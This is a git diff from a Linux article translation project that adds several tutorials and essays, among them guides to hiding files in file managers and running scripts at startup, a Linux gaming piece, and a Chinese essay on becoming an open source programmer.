root without explicitly logging as root. What more, you don't have to enter the root user's password as well. + +**Important**: Please note that there exists a **su** command which also lets you switch users (by default, it lets you become root). This command requires you to enter the 'root' password. To avoid this, you can also execute it with sudo ('sudo su'); in that case you'll just have to enter your login password. However, 'su' and 'sudo su' have some underlying differences - to understand them as well as know more about how 'sudo -i' compares to them, head [here][10]. + +### Conclusion + +I hope that by now you'd have at least got the basic idea behind sudo, and how you tweak it's default behavior. Do try out the /etc/sudoers tweaks we've explained here, also go through the forum discussion (linked in the last paragraph) to get more insight about the sudo command. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/sudo-beginners-guide/ + +作者:[Himanshu Arora][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/ +[1]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#the-k-option +[2]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#the-s-option +[3]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#the-i-option +[4]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#what-is-sudo +[5]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#can-any-user-use-sudo +[6]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#what-is-a-sudo-session +[7]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#the-sudo-password +[8]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#some-important-sudo-command-line-options +[9]:https://www.howtoforge.com/tutorial/sudo-beginners-guide/#conclusion +[10]:http://unix.stackexchange.com/questions/98531/difference-between-sudo-i-and-sudo-su +[11]:https://www.howtoforge.com/images/sudo-beginners-guide/big/perm-denied-error.png +[12]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-example.png +[13]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-switch-user.png +[14]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-user-accounts.png +[15]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-user-unlock.png +[16]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-admin-account.png +[17]:https://www.sudo.ws/man/1.8.17/visudo.man.html +[18]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-session-time-default.png +[19]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-session-timeout.png +[20]:https://www.howtoforge.com/images/sudo-beginners-guide/big/sudo-password.png diff --git a/sources/tech/20170213 How To Hide Files And Folders in File Manager Without Renaming.md b/sources/tech/20170213 How To Hide Files And Folders in File Manager Without Renaming.md new file mode 100644 index 0000000000..4020b18bd8 --- /dev/null +++ b/sources/tech/20170213 How To Hide Files And Folders in File Manager Without Renaming.md @@ -0,0 +1,152 @@ +How To Hide Files And Folders in File Manager Without Renaming +============================================================ + +If the system used by more than one users and you want to hide some files or folders (personal reasons) from others in file manager (most of the users won’t go depth in Linux, they will see what are the files or folders listed in file manager), we can do it in three way. Additionally you can protect files or folders with password. In this tutorial we are going to see, How To Hide Files And Folders in File Manager Without Renaming. + +We all knows, by renaming a file or folder with a `dot` (“.”) prefix, can hide a file or folder in Linux. This is not the right/efficient way to hide a file or folder. Some file managers also hide files that end with a tilde (“~”), those are considered backup files. + +Three way to hide files or folders in file manager. + +* Add a `dot` (“.”) prefix with file or folder name. +* Create a file called `.hidden` and add files or folders on it. +* Nautilus Hide extension + +#### Hide a file or folder with dot (“.”) prefix + +This is known method for everyone because by default file manager & terminal wont shows the `dot` (“.”) prefix files or folders. To hide an existing file, we have to rename it. That’s not always good idea. I will not recommend this but for emergence purpose you can use it and don’t do this purposely. + +For testing purpose, i’m going to create a new folder called `.magi`. See the below output, it won’t shows the `dot` (“.”) prefix files or folders when i use `ls -lh`. The same out you can see the file managers too. + +``` +# mkdir .magi + +# ls -lh +total 36K +-rw-r--r-- 1 magi magi 32K Dec 28 03:29 nmon-old +``` + +File Manager View. +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][2] + +For clarification, i added `-a` options with ls command to list hidden files too (Yes, now i can see the file name .magi). + +``` +# ls -la +total 52 +drwxr-xr-x 4 magi magi 4096 Feb 12 01:09 . +drwxr-xr-x 24 magi magi 4096 Feb 11 23:41 .. +drwxr-xr-x 2 magi magi 4096 Feb 12 01:09 .magi +-rw-r--r-- 1 magi magi 32387 Dec 28 03:29 nmon-old +``` + +To see the hidden files on file manager, simple press `Ctrl+h`, again press `Ctrl+h` to hide it. +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][3] + +#### Hide a file or folder with help of (“.hidden”) file Without Renaming + +If you want to hide a file without renaming it ? In other hand some of the applications wont allow you to rename. For this kind of situation, you can go with `.hidden` file, probably well suitable option for you. + +Some file managers, like Nautilus, Nemo, Caja, Thunar offering a native way to hide files without renaming it, how ? simple create the file called `.hidden` where you want to hide files, and add the list of files and folders line-by-line (one by one). Finally refresh the folder, now those files will not be visible. + +For testing purpose, i’m going create a file name called `.hidden` and 2g & 2daygeek in the same directory (Documents), then add those into “.hidden” file. + +``` +# touch 2g +# mkdir 2daygeek + +# nano .hidden +2g +2daygeek +``` + +Before adding files into .hidden file. +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][4] + +After files added into .hidden file. +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][5] + +Bring all the files by hitting `Ctrl+h` +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][6] + +#### Nautilus Hide extension + +[Nautilus Hide][7] is a simple Python extension for the Nautilus file manager that adds options to the right-click menu to hide or unhide files. + +Install Nautilus & Namo Hide extension on Ubuntu and its directives We can easily install Nautilus & Namo Hide extension on Ubuntu and its directives by running following commands. + +``` +$ sudo apt install nautilus-hide +$ nautilus -q + +$ sudo apt install nemo-hide +$ nemo -q +``` + +Follow the below procedure to install Nautilus hide extension on DEB based systems + +``` +$ sudo apt install cmake gettext python-nautilus xdotool +$ mkdir build +$ cd build +$ cmake .. +$ sudo make +$ sudo make install +$ nautilus -q +``` + +Follow the below procedure to install Nautilus hide extension on RPM based systems + +``` +$ sudo [yum|dnf|zypper] install cmake gettext nautilus-python xdotool +$ mkdir build +$ cd build +$ cmake .. +$ sudo make +$ sudo make install +$ nautilus -q +``` + +This extension simply uses that `.hidden` file to hide files. When you choose a file to hide, its name is added to `.hidden` file. When you choose to unhide it (For unhidden, press `Ctrl+h` to bring all the files, including (“.”) files, then Unhide Files), the name is removed from `.hidden` file (.hidden file also go away, when you unhidden all the files which is listed in .hidden file). If the file isn’t hidden/unhidden, press F5 to refresh the folder. + +You might ask me, why i want to install Nautilus Hide extension because method two also doing the same. In method two, we need to create a `.hidden` file manually wherever it’s required then have to add file lists but here everything automated. simple right click then chose hide or unhide (it will automatically create .hidden file, if it’s not present). + +Hide a file using Nautilus Hide extension See the below screenshot, we are using Nautilus Hide extension to hiding a file. +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][8] + +Unhide a file using Nautilus Hide extension See the below screenshot, we are using Nautilus Hide extension to unhiding a file (Bring all the files by hitting `Ctrl+k`, so that you can see all the hidden files & folders). +[ + ![](http://www.2daygeek.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][9] + +-------------------------------------------------------------------------------- + +via: http://www.2daygeek.com/how-to-hide-files-and-folders-in-file-manager-without-renaming/ + +作者:[MAGESH MARUTHAMUTHU ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.2daygeek.com/how-to-hide-files-and-folders-in-file-manager-without-renaming/ +[1]:http://www.2daygeek.com/author/magesh/ +[2]:http://www.2daygeek.com/wp-content/uploads/2020/08/hide-files-and-folders-in-file-manager-without-renaming-linux-1a.png +[3]:http://www.2daygeek.com/wp-content/uploads/2020/08/hide-files-and-folders-in-file-manager-without-renaming-linux-2a.png +[4]:http://www.2daygeek.com/wp-content/uploads/2020/08/hide-files-and-folders-in-file-manager-without-renaming-linux-5.png +[5]:http://www.2daygeek.com/wp-content/uploads/2017/02/hide-files-and-folders-in-file-manager-without-renaming-linux-6.png +[6]:http://www.2daygeek.com/wp-content/uploads/2017/02/hide-files-and-folders-in-file-manager-without-renaming-linux-7.png +[7]:https://github.com/brunonova/nautilus-hide +[8]:http://www.2daygeek.com/wp-content/uploads/2017/02/hide-files-and-folders-in-file-manager-without-renaming-linux-3a.png +[9]:http://www.2daygeek.com/wp-content/uploads/2020/08/hide-files-and-folders-in-file-manager-without-renaming-linux-4.png diff --git a/sources/tech/20170213 How to Auto Execute CommandsScripts During Reboot or Startup.md b/sources/tech/20170213 How to Auto Execute CommandsScripts During Reboot or Startup.md new file mode 100644 index 0000000000..dd1a41b24a --- /dev/null +++ b/sources/tech/20170213 How to Auto Execute CommandsScripts During Reboot or Startup.md @@ -0,0 +1,101 @@ +How to Auto Execute Commands/Scripts During Reboot or Startup +============================================================ + + Download Your Free eBooks NOW - [10 Free Linux eBooks for Administrators][5] | [4 Free Shell Scripting eBooks][6] + +I am always fascinated by the things going on behind the scenes when I [boot a Linux system and log on][1]. By pressing the power button on a bare metal or starting a virtual machine, you put in motion a series of events that lead to a fully-functional system – sometimes in less than a minute. The same is true when you log off and / or shutdown the system. + +What makes this more interesting and fun is the fact that you can have the operating system execute certain actions when it boots and when you logon or logout. + +In this distro-agnostic article we will discuss the traditional methods for accomplishing these goals in Linux. + +Note: We will assume the use of Bash as main shell for logon and logout events. If you happen to use a different one, some of these methods may or may not work. If in doubt, refer to the documentation of your shell. + +### Executing Linux Scripts During Reboot or Startup + +There are two traditional methods to execute a command or run scripts during startup: + +#### Method #1 – Use a cron Job + +Besides the usual format (minute / hour / day of month / month / day of week) that is widely used to indicate a schedule, [cron scheduler][2] also allows the use of `@reboot`. This directive, followed by the absolute path to the script, will cause it to run when the machine boots. + +However, there are two caveats to this approach: + +1. a) the cron daemon must be running (which is the case under normal circumstances), and +2. b) the script or the crontab file must include the environment variables (if any) that will be needed (refer to this StackOverflow thread for more details). + +#### Method #2 – Use /etc/rc.d/rc.local + +This method is valid even for systemd-based distributions. In order for this method to work, you must grant execute permissions to `/etc/rc.d/rc.local` as follows: + +``` +# chmod +x /etc/rc.d/rc.local +``` + +and add your script at the bottom of the file. + +The following image shows how to run two sample scripts (`/home/gacanepa/script1.sh` and `/home/gacanepa/script2.sh`) using a cron job and rc.local, respectively, and their respective results. + +script1.sh: +``` +#!/bin/bash +DATE=$(date +'%F %H:%M:%S') +DIR=/home/gacanepa +echo "Current date and time: $DATE" > $DIR/file1.txt +``` +script2.sh: +``` +#!/bin/bash +SITE="Tecmint.com" +DIR=/home/gacanepa +echo "$SITE rocks... add us to your bookmarks." > $DIR/file2.txt +``` +[ + ![Run Linux Scripts at Startup](http://www.tecmint.com/wp-content/uploads/2017/02/Run-Linux-Commands-at-Startup.png) +][3] + +Run Linux Scripts at Startup + +Keep in mind that both scripts must be granted execute permissions previously: + +``` +$ chmod +x /home/gacanepa/script1.sh +$ chmod +x /home/gacanepa/script2.sh +``` + +### Executing Linux Scripts at Logon and Logout + +To execute a script at logon or logout, use `~.bash_profile` and `~.bash_logout`, respectively. Most likely, you will need to create the latter file manually. Just drop a line invoking your script at the bottom of each file in the same fashion as before and you are ready to go. + +##### Summary + +In this article we have explained how to run script at reboot, logon, and logout. If you can think of other methods we could have included here, feel free to use the comment form below to point them out. We look forward to hearing from you! + +-------------------------------------------------------------------------------- + +作者简介: + +I am Ravi Saive, creator of TecMint. A Computer Geek and Linux Guru who loves to share tricks and tips on Internet. Most Of My Servers runs on Open Source Platform called Linux. Follow Me: Twitter, Facebook and Google+ + +-------------------------------------------------------------------------------- + + +via: http://www.tecmint.com/auto-execute-linux-scripts-during-reboot-or-startup/ + +作者:[Ravi Saive ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[00]:https://twitter.com/ravisaive +[01]:https://www.facebook.com/ravi.saive +[02]:https://plus.google.com/u/0/+RaviSaive + +[1]:http://www.tecmint.com/linux-boot-process/ +[2]:http://www.tecmint.com/11-cron-scheduling-task-examples-in-linux/ +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/Run-Linux-Commands-at-Startup.png +[4]:http://www.tecmint.com/author/gacanepa/ +[5]:http://www.tecmint.com/10-useful-free-linux-ebooks-for-newbies-and-administrators/ +[6]:http://www.tecmint.com/free-linux-shell-scripting-books/ diff --git a/sources/tech/20170213 The Best Operating System for Linux Gaming Which One Do You Use and Why.md b/sources/tech/20170213 The Best Operating System for Linux Gaming Which One Do You Use and Why.md new file mode 100644 index 0000000000..3a638b150b --- /dev/null +++ b/sources/tech/20170213 The Best Operating System for Linux Gaming Which One Do You Use and Why.md @@ -0,0 +1,48 @@ +The Best Operating System for Linux Gaming: Which One Do You Use and Why? +============================================================ + + +### Tell us which is the best Linux distro for Linux gaming + + +In the last few months, we tried multiple GNU/Linux distributions for gaming purposes, and we have come to the conclusion that there's no perfect operating system out there designed for Linux gaming. + +We all know that the world of gaming is split between Nvidia and AMD users. Now, if you're using an Nvidia graphics card, even one from five years ago, chances are it's supported on most Linux-based operating systems because Nvidia provides up-to-date video drivers for most, if not all of its GPUs. + +Of course, this means that you shouldn't have any major issues with most GNU/Linux distributions if you have an Nvidia GPU. At least not related to graphical artifacts or other performance problems when playing games, which will drastically affect your gaming experiences. + +The best Linux gaming OS for AMD Radeon users + +Now, things are totally different if you're using an AMD Radeon GPU. We all know that AMD's proprietary graphics drivers still need a lot of work to be compatible with the latest GNU/Linux distributions and all the AMD GPUs that exist out there, as well as the latest X.Org Server and Linux kernel releases. + +Currently, the AMDGPU-PRO video driver works only on Ubuntu 16.04 LTS, CentOS 6.8/7.3, Red Hat Enterprise Linux 6.8/7.3, and SUSE Linux Enterprise Desktop and Server 12 SP2\. With the exception of Ubuntu 16.04 LTS, we have no idea why AMD provides support for all those server-oriented and enterprise-ready operating systems. + +We refuse to believe that there are Linux gamers out there who use any of these OSes for anything gaming related. The [latest AMDGPU-PRO update][1] finally brought support for AMD Radeon GPUs from the HD 7xxx and 8xxx series, but what if we don't want to use Ubuntu 16.04 LTS? + +On the other hand, we have the Mesa 3D Graphics Library, which is found on most distros out there. The Mesa graphics stack provides us with quite powerful open-source Radeon and AMDGPU drivers for our AMD GPUs, but to enjoy the best gaming experience possible, you also need to have the latest X.Org Server and Linux kernels. + +Not all Linux operating systems come with the latest Mesa (13.0), X.Org Server (1.19), and Linux kernel (4.9) versions with support for older AMD GPUs. Some have only one or two of these technologies, but we need them all and the kernel needs to be compiled with AMD Radeon Southern Islands and Sea Island support for the AMDGPU driver to work. + +We found the entire situation quite disheartening, at least for some AMD Radeon gamers using a bit older graphics cards. For now, we have discovered that the best gaming experience with an AMD Radeon HD 8xxx GPU can be achieved only by using Mesa 17 from Git and Linux kernel 4.10 RC. + +So we're asking you now - if you've found the perfect GNU/Linux distribution for gaming, no matter if your using an AMD Radeon or Nvidia GPU, but we are most interested in those who are using AMD GPUs, what distro and settings are you using and can you play the latest games or are still experiencing issues? Thank you! + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/the-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml + +作者:[Marius Nestor ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://news.softpedia.com/news/amdgpu-pro-16-60-linux-driver-finally-adds-amd-radeon-hd-7xxx-8xxx-support-512280.shtml +[2]:http://news.softpedia.com/editors/browse/marius-nestor +[3]:http://news.softpedia.com/news/the-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml# +[4]:https://share.flipboard.com/bookmarklet/popout?v=2&title=The+Best+Operating+System+for+Linux+Gaming%3A+Which+One+Do+You+Use+and+Why%3F&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Fthe-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml&t=1487038258&utm_campaign=widgets&utm_medium=web&utm_source=flipit&utm_content=news.softpedia.com +[5]:http://news.softpedia.com/news/the-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml# +[6]:http://twitter.com/intent/tweet?related=softpedia&via=mariusnestor&text=The+Best+Operating+System+for+Linux+Gaming%3A+Which+One+Do+You+Use+and+Why%3F&url=http%3A%2F%2Fnews.softpedia.com%2Fnews%2Fthe-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml +[7]:https://plus.google.com/share?url=http://news.softpedia.com/news/the-best-operating-system-for-linux-gaming-which-one-do-you-use-and-why-512861.shtml +[8]:https://twitter.com/intent/follow?screen_name=mariusnestor diff --git a/translated/talk/20170109 How to get started as an open source programmer .md b/translated/talk/20170109 How to get started as an open source programmer .md new file mode 100644 index 0000000000..ef3a18309e --- /dev/null +++ b/translated/talk/20170109 How to get started as an open source programmer .md @@ -0,0 +1,151 @@ +How to get started as an open source programmer +============================================================ +如何成为一名开源程序员 + + ![How to get started as an open source programmer](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/programming_keys.jpg?itok=_VDcN66X "How to get started as an open source programmer") + +图片来源 : + +Zagrev [Flickr 网站][1] [CC BY-SA 2.0][2]。 + +科技世界的探索总是让我们兴奋不已。很多科技日新月异,你探索得越远越深,你看到的世界就越广阔无穷,这就像是[一只只驼下去的海龟][3]一样。因此,科技世界也像宇宙一样无穷无尽。如果你也渴望加入到推动技术世界发展的社区中,你应该如何开始呢?你要做的第一步是什么?以后应该怎么做? + +首先你得明白开源指的是开放软件源代码的意思。这个很好理解,但是“开源”这个词最近一段时间经常出现在我们身边,所以估计有时候大家都忘记了开源只是用来形容一种文化现象,而不是一家世界 500 强公司的名字。跟其它工作或组织不同的是,你不用去参加面试或填个申请表或注册表的方式来成为一名开源程序员。你需要做的就是_编程_,然后把代码共享出来,并且完全保证在任何情况下该代码都保持开放状态。 + +只需要这样,你就已经成为一名开源程序员了! + +现在你有了目标,那么你为之奋斗的基础能力怎么样了? + +### 技能树 + +你玩过 RPG 游戏吗?在那些游戏中就有关于线性“技能树”的概念。当你玩游戏时,你掌握了基本技能后,游戏便会自动“升级”,并且你也会获得新的技能,然后你再使用这些新的技能将游戏“升级”到一个更高的等级,你又会得到更多新的技能。通过这样不断的升级,获取新技能,以让你的游戏角色变得更强大。 + +成为一个程序员有点像提升你的技能树等级。你掌握了一些基础的技术,在参与开源项目开发的过程中,你不断实践,直至自己的技术等级上升到一个新的层次,之后你又懂了一些新的技术,并在项目开发过程中不断实践,不断提升技术等级,然后你再根据这个技能树不断成长,不断进步。 + +你会发现自己面临的不只一棵技能树。开源软件涉及到的技术比较多,包括很多参与者自身的优势、能力及兴趣爱好等。然而,有一些非常重要的技能有助于你成为一名伟大的程序员,不断的提高这些技能是成功参与到开源项目中的重要组成部分。 + +### 脚本编程 + + ![Scroll--How to program ](https://opensource.com/sites/default/files/scroll.png "Scroll--How to program") + +对于 POSIX 系统,比如 Linux 或 BSD 系统最大的优势之一就是在你每次使用电脑的过程中,你都有机会练习编程。如果你不知道如何开始编程,你可以从解决工作中的一些基本问题做起。想想你日常工作中有哪些重复性的工作,你可以通过编写脚本的方式来让它们自动执行。这一步非常简单,比如说批量转换文件格式或重置图片的大小、检查邮件,甚至是通过单击运行你最常用的五个应用程序。无论是什么任务,你可以花一些时间去编写脚本以让它们自动完成。 + +如果有些工作需要在控制终端下操作,那么你就可以编写脚本来完成。学习 'bash' 或 'tsch’ 编程,把编写系统脚本作为你写代码和理解系统的工作原理的第一步。 + +### 系统管理 + + ![Caesar head](https://opensource.com/sites/default/files/caesar_0.png "Caesar head") + +从这一点来讲,你也可以同时作为一个程序员,或者你还可以学习到多个技能树中的技能:那就是系统管理工作。跟程序员比起来,这两个职业在技能上有一些相似(一个优秀的系统管理员应该有一些编程经验,并能够熟练使用 Python , Perl ,或者其它类似的编程言语来解决一些独特的问题),而_程序员_指的是那些一直编写代码的人。 + +### 程序员 + + ![Wizard hat--How to program](https://opensource.com/sites/default/files/pointy-hat.png "Wizard hat--How to program") + +开源是学习编程技巧最好的方式:你可以查看其他人写的代码,从中借鉴他们的想法和技术,从他们的错误中学习,并跟自己写的代码进行对比以发现两者的优缺点,如果你是使用 Linux 或 BSD 操作系统,整个堆栈对你来说都是开放的,你可以随便操作。 + +这就像旅游指南里所说的,随心所欲。事实上你不太可能会去深入浅出研究一个项目的源代码,但是那样可以让你在某一时刻突然意识到自己会编程了。编程是一份很难的技术活,否则大家都可以从事编程工作了。 + +幸运的是,编程是有逻辑和数据结构的,这些特性跟编程语言相关。你也许不会深入的去研究编程,但是你研究得越深,你懂的越多。 + +懂得如何控制以及让电脑自动执行任务是一回事,但是知道如何编写其它人想自动实现任务的代码,才能说明你已经真正进入到编程领域了。 + +### 精通多种编程语言 + + ![Parrot--How to Program](https://opensource.com/sites/default/files/parrot-head.png "Parrot--How to Program") + +所有的编程语言都旨在处理相同的任务:让计算机能够完成计算工作。选择一种编程语言时你得考虑以下几个因素,你学编程的目的是什么,你所做的工作最常用的编程语言是什么,你最容易理解哪一种编程语言以及你的学习方式。 + +随便查下相关资料,你就可以了解编程语言的复杂性了,然后再根据自己的能力水平来决定先学习哪种编程语言。 + +选择编程语言的另一个方式是根据你的使用目的来决定,看看你身边的同事使用哪种编程语言。如果大家都是为了开发桌面环境的工具,你应该学习 C 语言和 Vala 语言,或者 C++ 语言。 + +总之,不要在各种编程语言之间不知所措。编程语言之间都是相通的。当你学好一种编程语言并能用它来解决工作中的一些实际问题的时候,你会发现学习另外一种编程语言更容易。毕竟,编程语言只是一些语法和相关规则的集合;学会一种编程语言后,再使用同样的方法去搞懂另外一种语言完全不是个事。 + +主要目的还是学会一种编程语言。选择一个比较适合自己或者你感兴趣的编程语言,或者是你的朋友在用的编程语言,或者是选择文档比较丰富,并且你理解起来也容易的编程语言,但是,最好是只关注并先学会其中的一种编程语言。 + +### 这是一个开源项目吗? + +无论你是编程新手还是一个老司机,在你进入到开源世界之前,你需要搞明白组成开源软件的重要一点就是“开放源代码”。 + +最近一些厂商惯用的市场营销策略就是宣称他们的软件是开源的。然而,有些厂商只是发布了一个公共的 API 或者表示他们愿意接受其它开源用户提交的代码而已。“开源”这个词不是一个商标,并且也没有任何组织来决定怎么使用这个词。但是, Debian Linux 创造人 Ian Murdock 联合成立的[开放源代码促进会][4]对开源这个词进行了[定义][5](授权“允许软件被用户免费使用,随意修改及分享”),并且被正式批准和[授予][6]许可证的软件才属于真正的开源软件。 + +把这些许可证条例应用到你的软件代码中,你就成为一名开源程序员了。 +恭喜你! + +### 开源社区 + + ![Community--How to program](https://opensource.com/sites/default/files/minions.png "Community--How to program") + +咨询任何开源软件爱好者,他们会告诉你开源软件最关键的是人。没有积极的开源贡献者,软件开发就会中止。计算机需要用户,提交缺陷的人、设计师及程序员。 + +如果你想加入全球开源社区为开源软件做贡献,即使你是个人用户,你同样需要成为该社区的一个成员。这通常包括预定邮件列表,加入 IRC 频道,或者在论坛里表现活跃,并从最低级别开始。任何成熟的开源社区都有很多积极的参与者,因此你得理解在这个社区同意你加入之前,你必须证明自己不会轻易地离开这个社区。并且准备好为那些你非常感兴趣的项目提供长期的支持。 + +如果你只是想给他们提供一些小的帮助,这也是可以接受的。我自己也提交一些小的更新包到一些项目中,有时候项目管理者会觉得这个更新比较好,有时候他们也会拒绝我提交的代码更新包。但是,如果这个被拒绝的更新包对我很重要,我同样会维护并应用到客户的系统中,之后,我同样会继续努力。 + +这只是参与到开源项目中的一部分。 + +但是这些社区在哪里呢?这个跟开源项目有关。有些项目有专职的社区管理员,他们会把所有的社区参与者招集到一起,让彼此之间更了解。有些项目则来自你身边的一些论坛,他们使用邮件列表,或者使用问题追踪器与参与者联系。找到这些开源社区对你来说也不是个事儿。 + +还有个重要的事情就是研究他们的源代码!有些开发商由于某些原因宣称他们的软件是开源的,因此你还得了解下他们的源代码。尽管要全面了解他们的项目绝非易事,但是你也知道了这个项目是如何管理的,他们最可能需要帮助的是什么。关于代码是如何组织的?这些代码有注释吗?它们使用统一的程序风格吗?这些问题你可以查阅相关文档,尤其是 README , LICENSE ,或者是 COPYING 这几个文件。 + +不要低估遵守开放式源代码承诺的重要性。这是你被允许参与进来到开源项目来的原因,因此,你得深入地考虑下你能从中学习到什么,以及你将如何为该项目提供帮助。 + +找到最佳的开源社区更像是约会,尤其更像是在[圣烛节][7]上的聚会。这需要时间,并且刚开始那几次有可能会失败。你参与这样的聚会越多,你就越了解这些开源项目。最后,你会更了解自己,当你找到了与其它参与者融为一体的方式时,你就已经成功了。总之,你得要有耐心,一切顺其自然。 + +### 行动比语言更重要 + + ![Wingfoot--How to Program](https://opensource.com/sites/default/files/wingfoot.png "Wingfoot--How to Program") + +作为一名开源程序员最重要的是写代码,任何想法都没多少意义。关键是把你的想法变成实际的东西。你要让大家都知道你很了解自己的工作,你不怕苦不怕累,也愿意在开源项目上花时间,并且能够通过编程的方式来实现自己的各种想法。 + +为了更高效地完成那些工作,当然,除了完成开源项目上的工作,你还要懂得如何接受其它参与者提交的更新,以及哪一个更新更有助于系统的稳定及发展。 + +从下面几点开始: + +* 熟悉一个项目及其它协作开发模式,并且也要支持这种开发模式。 +* 编写软件升级包,缺陷修复包,或者一些小功能,并且提交它们。 +* 如果你提交的更新补丁被拒绝了,也不要难过。他们拒绝的不是你个人,而是开发小组在针对你提交的代码进行评估后作出的一个反馈。 +* 如果你提交的代码被改得面目全非后才被接受也不要泄气。 +* 重头再来,不断努力,再接受更大的挑战。 + + ![Leaderboard--How to program](https://opensource.com/sites/default/files/leaderboard.png "Leaderboard--How to program") + +在开源项目中不应该开设排行榜。然而,有些开源社区却弄了个贡献排名,其实这没必要。大家只需要积极参与、贡献、提交自己的更新,然后把自己所做的提交都隐藏,这样就可以了。 + +### 开发软件 + + ![Treasure Map--How to Program](https://opensource.com/sites/default/files/treasure-map.png "Treasure Map--How to Program") + +编程在任何情况下都是为了自身的发展。无论你是否为了寻找解决问题的新方法,寻找优化代码的方式,学习新的编程语言,或者是学习如何更好的与其它人员合作,你都不要停止学习。你自己成长得越多,对开源项目越有帮助。 + +个人成长和职业技能的提升是你参与开源项目的终极目标,但是实际上这是一个贯穿整个项目的持续过程。开源程序员跟公务员不一样;这是一个持之以恒的过程。你需要持续不断的学习技术,分享知识,这个过程就像[游戏人生][8]中一样,但是你也学到了很多的东西。 + +这就是开源程序的过程:自由开发每一行代码。因此,找到你的技能树,激发出自己的潜能,不断提高自己的技能,并且积极参与到开源项目中。 +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/penguinmedallion200x200.png?itok=ROQSR50J) + +Seth Kenlon —— Seth Kenlon 是一位独立多媒体艺术家,开源文化倡导者, Unix 极客。他还是 Slackware 多媒体产品项目的维护人员之一,官网:http://slackermedia.ml 。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/how-get-started-open-source-programmer + +作者:[Seth Kenlon][a] +译者:[rusking](https://github.com/rusking) +校对:[Bestony](https://github.com/Bestony) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/seth +[1]:https://www.flickr.com/photos/zagrev/79470567/in/photolist-82iQc-pijuye-9CmY3Z-c1EJAf-4Y65Zt-dhLziB-51QVc-hjqkN-4rNTuC-5Mbvqi-5MfK13-7dh6AW-2fiSu7-48R7et-5sC5ck-qf1TE9-48R6qv-pXuSG9-KFBLJ-95jQ8U-jBR7-dhLpfV-5bCZVH-9vsPTT-bA2nvP-bn7cWw-d7j8q-ubap-pij32X-7WT6iw-dcZZm2-3knisv-4dgN2f-bc6V1-E9xar-EovvU-6T71Mg-pi5zwE-5SR26m-dPKXrn-HFyzb-3aJF9W-7Rvz19-zbewj-xMsv-7MFi3u-2mVokJ-nsVAx-7g5k-4jCbbP +[2]:https://creativecommons.org/licenses/by-nc-sa/2.0/ +[3]:https://en.wikipedia.org/wiki/Turtles_all_the_way_down +[4]:http://opensource.org/ +[5]:https://opensource.org/licenses +[6]:https://opensource.org/licenses/category +[7]:https://en.wikipedia.org/wiki/Groundhog_Day_(film) +[8]:https://en.wikipedia.org/wiki/Conway's_Game_of_Life diff --git a/translated/talk/20170116 Terrible Ideas in Git.md b/translated/talk/20170116 Terrible Ideas in Git.md new file mode 100644 index 0000000000..f3af553b9e --- /dev/null +++ b/translated/talk/20170116 Terrible Ideas in Git.md @@ -0,0 +1,39 @@ +Git 中糟糕的想法 +============================================================ + + + ![Corey Quinn](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/corey-quinn-lcna.png?itok=IU3oGzfn "Corey Quinn") +在 LinuxCon 北美会议上 FutureAdvisor 的 Corey Quinn 说:“Git 的确让你可以做一些额外的强大的事。在这次谈论中,强大是愚蠢的委婉说法” [Linux 基金会][2] + +在 LinuxCon 北美会议上 FutureAdvisor 的 Corey Quinn 说:“Git 